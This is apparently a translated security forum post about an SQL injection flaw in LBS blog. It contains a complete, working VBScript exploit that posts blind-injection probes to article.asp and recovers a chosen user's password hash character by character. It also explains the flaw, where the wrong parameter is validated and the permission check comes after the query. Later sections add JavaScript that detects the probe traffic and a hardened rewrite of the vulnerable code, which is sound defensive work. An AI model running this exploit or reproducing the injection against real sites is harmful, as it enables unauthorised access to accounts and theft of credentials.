Heh, this is just to prove the vulnerability exists.
The exp is below; save it as a .vbs, then download the program yourself and test it against your own install.
'From 剑心
'============================================================================
'Usage:
'At the command prompt:
'cscript.exe lbsblog.vbs <blog path of the target site> <a valid article id> <id of the blog user whose password is to be cracked>
'e.g.:
'cscript.exe lbsblog.vbs www.xxxx.com/blog/ 1 1
'by loveshell
'============================================================================
On Error Resume Next
Dim oArgs
Dim olbsXML            'XMLHTTP object used to open the target URL
Dim TargetURL          'target URL
Dim userid, articleid  'blog user id and article id
Dim TempStr            'holds the part of the MD5 password recovered so far
Dim CharHex            'hexadecimal character set
Dim charset
Set oArgs = WScript.arguments
If oArgs.count < 1 Then Call ShowUsage()
Set olbsXML = createObject("Microsoft.XMLHTTP")
'complete the target URL
TargetURL = oArgs(0)
If LCase(Left(TargetURL, 7)) <> "http://" Then TargetURL = "http://" & TargetURL
If right(TargetURL, 1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL = TargetURL & "article.asp"
articleid = oArgs(1)
userid = oArgs(2)
TempStr = ""
CharHex = Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f", ",")
WScript.echo "LBSblog All version Exploit" & vbcrlf
WScript.echo "By 剑心" & vbcrlf
WScript.echo "http://www.loveshell.net/ Just For fun :)" & vbcrlf & vbcrlf
WScript.echo "+ Fuck the site now" & vbcrlf
Call main(TargetURL, BlogName)
Set olbsXML = Nothing
'---------------------------------------------- sub -------------------------------------------------------
'============================================
'Function name: main
'Function: main routine, obtains the blog user's password via injection
'============================================
Sub main(TargetURL, BlogName)
Dim MainOffset, SubOffset, TempLen, OpenURL, GetPage
For MainOffset = 1 To 40
For SubOffset = 0 To 15
TempLen = 0
postdata = ""
postdata = articleid & " and (select left(user_password," & MainOffset & ") from blog_user where user_id=" & userid & ")='" & TempStr & CharHex(SubOffset) & "'"
OpenURL = TargetURL
olbsXML.open "Post", OpenURL, False, "", ""
olbsXML.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
olbsXML.send "act=delete&id=" & escape(postdata)
GetPage = BytesToBstr(olbsXML.ResponseBody)
'check whether the requested page exists
If InStr(GetPage, "deleted") <> 0 Then
'"博客用户不存在或填写的资料有误" is the error marker; getting it back means the guessed MD5 character is wrong
'if you end up with an MD5 of 0000000000000000, change the error marker
ElseIf InStr(GetPage, "permission") <> 0 Then
TempStr = TempStr & CharHex(SubOffset)
WScript.Echo "+ Crack now: " & TempStr
Exit for
Else
WScript.echo vbcrlf & "Something error" & vbcrlf
WScript.echo vbcrlf & GetPage & vbcrlf
WScript.Quit
End If
next
Next
WScript.Echo vbcrlf & "+ We Got It: " & TempStr & vbcrlf & vbcrlf & ":P Don't Be evil"
End sub
'============================================
'Function name: BytesToBstr
'Function: converts the content of the XMLHTTP object to GB2312 encoding
'============================================
Function BytesToBstr(body)
dim objstream
set objstream = createObject("ADODB.Stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
'============================
'Function name: ShowUsage
'Function: prints usage help
'============================
Sub ShowUsage()
WScript.echo "LBSblog Exploit" & vbcrlf & "By Loveshell/剑心"
WScript.echo "Usage:" & vbcrlf & "CScript " & WScript.ScriptFullName & " TargetURL BlogName"
WScript.echo "Example:" & vbcrlf & "CScript " & WScript.ScriptFullName & " http://www.loveshell.net/ 1 1"
WScript.echo ""
WScript.Quit
End Sub
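From the defender's side, the script above has a very recognisable shape: hundreds of POSTs to article.asp with act=delete and an id that is not a number. The following is an added example, not code from the original post or from LBS blog, showing request-level detection logic for that traffic. The sample requests, the client addresses, and the alert threshold are constructed for the demo; a real deployment would feed it from a WAF or reverse-proxy request hook.

```javascript
"use strict";

// Decode an application/x-www-form-urlencoded body into a key/value object.
function parseForm(body) {
  const out = {};
  for (const pair of body.split("&")) {
    if (!pair) continue;
    const eq = pair.indexOf("=");
    const k = decodeURIComponent(eq < 0 ? pair : pair.slice(0, eq));
    const v = eq < 0 ? "" : decodeURIComponent(pair.slice(eq + 1).replace(/\+/g, " "));
    out[k] = v;
  }
  return out;
}

// Flag one request: article.asp expects a numeric id on act=delete, so anything
// else in id is either a client bug or an injection attempt. Returns null when
// the request is not of interest.
function inspectRequest(req) {
  if (req.method !== "POST" || !/\/article\.asp$/i.test(req.path)) return null;
  const form = parseForm(req.body);
  if (form.act !== "delete" || form.id === undefined) return null;
  if (/^\d+$/.test(form.id)) return null;
  const reasons = ["non-numeric id"];
  if (/\b(select|and|or)\b.*\b(user_password|from)\b/i.test(form.id)) reasons.push("sql keywords");
  return { client: req.client, reasons };
}

// Run over a request stream and count alerts per client: a character-at-a-time
// oracle needs many requests, so repetition from one source is the strongest signal.
function scanRequests(requests, threshold) {
  const perClient = {};
  const alerts = [];
  for (const req of requests) {
    const hit = inspectRequest(req);
    if (!hit) continue;
    alerts.push(hit);
    perClient[hit.client] = (perClient[hit.client] || 0) + 1;
  }
  const bruteForceClients = Object.keys(perClient).filter((c) => perClient[c] >= threshold);
  return { alerts, perClient, bruteForceClients };
}

// Constructed sample traffic: a normal delete, an unrelated GET, one malformed id,
// and a short run of oracle-style probes from a single client (constructed values).
const sampleRequests = [
  { client: "10.0.0.5", method: "POST", path: "/blog/article.asp", body: "act=delete&id=12" },
  { client: "10.0.0.5", method: "GET", path: "/blog/article.asp", body: "" },
  { client: "10.0.0.7", method: "POST", path: "/blog/article.asp", body: "act=delete&id=12abc" },
  ...["0", "1", "2"].map((c) => ({
    client: "10.0.0.7",
    method: "POST",
    path: "/blog/article.asp",
    body: "act=delete&id=" + encodeURIComponent(
      "1 and (select left(user_password,1) from blog_user where user_id=1)='" + c + "'"),
  })),
];

// Demo run: prints the per-client counts and which clients crossed the threshold.
const report = scanRequests(sampleRequests, 3);
console.log(JSON.stringify(report, null, 2));
```

The threshold matters more than the keyword regex: the VBScript sends up to 16 probes per recovered character, so even a crude "more than N non-numeric ids from one client on this endpoint" rule catches it long before the password is out, while a single malformed id from a broken client only produces a low-severity alert.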
Vulnerability description:
In src_article.asp:
......
input["log_id"] = func.checkInt(input["log_id"]);
if (!input["id"]) {
    strError = lang["invalid_parameter"];
} else {
    // Check if the article exists
    theArticle.load("log_id,log_authorID,log_catID", "log_id=" + input["id"]);
    strError = false;
}
......
What gets filtered is log_id, but what actually gets used is id, heh :)
And then?
The code in class/article.asp:
this.load = function(strselect, strwhere) {
    var tmpA = connBlog.query("select TOP 1 " + strselect + " FROM [blog_Article] where " + strwhere);
    if (tmpA) {
        this.fill(tmpA[0]);
        return true;
    } else {
        return false;
    }
}
The above needs no explanation, heh. Triggering it does have a precondition though; let's see whether it can be met!
function articledelete() {
    if (theUser.rights["delete"] < 1) {
        // Check User Right - without DB Query
        pageHeader(lang["error"]);
        redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "javascript:window.history.back();", false, "errorbox");
    } else {
        var theArticle = new lbsArticle();
        var strError;
By default guest has delete rights too; although a further check is made afterwards, the injection has already happened by then, and that later check is exactly what we use to drive the injection, heh
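The two defects above are a validate-the-wrong-key bug and a check-after-query ordering bug. The following is an added example, not code from the original post or from LBS blog, that puts the vulnerable shape of src_article.asp next to a hardened one in plain JavaScript. The bodies of checkInt, the in-memory stand-in for blog_Article and connBlog.query, and the ownership check inside deleteArticle are assumptions made for this demo (the page cuts off before LBS's own later check); only the names come from the code quoted above.

```javascript
"use strict";

// Assumed behaviour of LBS's func.checkInt (its real body is not on the page):
// return the integer if the value is a plain decimal number, otherwise 0.
function checkInt(value) {
  return /^\d+$/.test(String(value)) ? parseInt(value, 10) : 0;
}

// Constructed stand-in for the blog_Article table.
const blogArticle = [
  { log_id: 1, log_authorID: 1, log_catID: 1 },
  { log_id: 2, log_authorID: 2, log_catID: 1 },
];

// The shape src_article.asp has: the key that is sanitised (log_id) is not the
// key that reaches the WHERE clause (id), so the raw value is concatenated.
function buildWhereVulnerable(input) {
  input["log_id"] = checkInt(input["log_id"]);
  if (!input["id"]) return null;          // lang["invalid_parameter"] path
  return "log_id=" + input["id"];         // this string is what connBlog.query would receive
}

// Hardened shape: validate the value that is actually used, reject anything that
// is not a positive integer, and hand back a parameter rather than SQL text.
function buildWhereSafe(input) {
  const id = checkInt(input["id"]);
  if (id < 1) return null;                // lang["invalid_parameter"] path
  return { sql: "log_id=?", params: [id] };
}

// Lookup over the in-memory table, standing in for connBlog.query + load();
// it compares against the typed parameter and never interpolates it.
function loadArticle(where) {
  if (!where) return false;
  const [id] = where.params;
  return blogArticle.find((row) => row.log_id === id) || false;
}

// Mirror of articledelete() with the checks in the right order: the rights check
// and parameter validation both run before any query touches the table, and the
// (assumed) ownership check runs on the loaded row afterwards.
function deleteArticle(user, input) {
  if (!user.rights || !(user.rights["delete"] >= 1)) return { ok: false, reason: "no_rights" };
  const where = buildWhereSafe(input);
  if (!where) return { ok: false, reason: "invalid_parameter" };
  const article = loadArticle(where);
  if (!article) return { ok: false, reason: "not_found" };
  if (article.log_authorID !== user.id) return { ok: false, reason: "no_rights" };
  return { ok: true, deleted: article.log_id };
}

// Demo run: the same probe reaches SQL text in the old shape and is refused in the new one.
const probe = { id: "1 and 1=1" };
console.log(buildWhereVulnerable({ ...probe }));   // "log_id=1 and 1=1"  (attacker text reaches SQL)
console.log(buildWhereSafe({ ...probe }));         // null                (rejected before any query)
```

Note that a guest with rights["delete"] set to 1 still gets past the first check in both versions; what changes is that in the hardened version a non-numeric id is rejected before the query runs, so the difference between "deleted" and "permission" responses that the VBScript uses as its oracle no longer depends on anything the attacker controls.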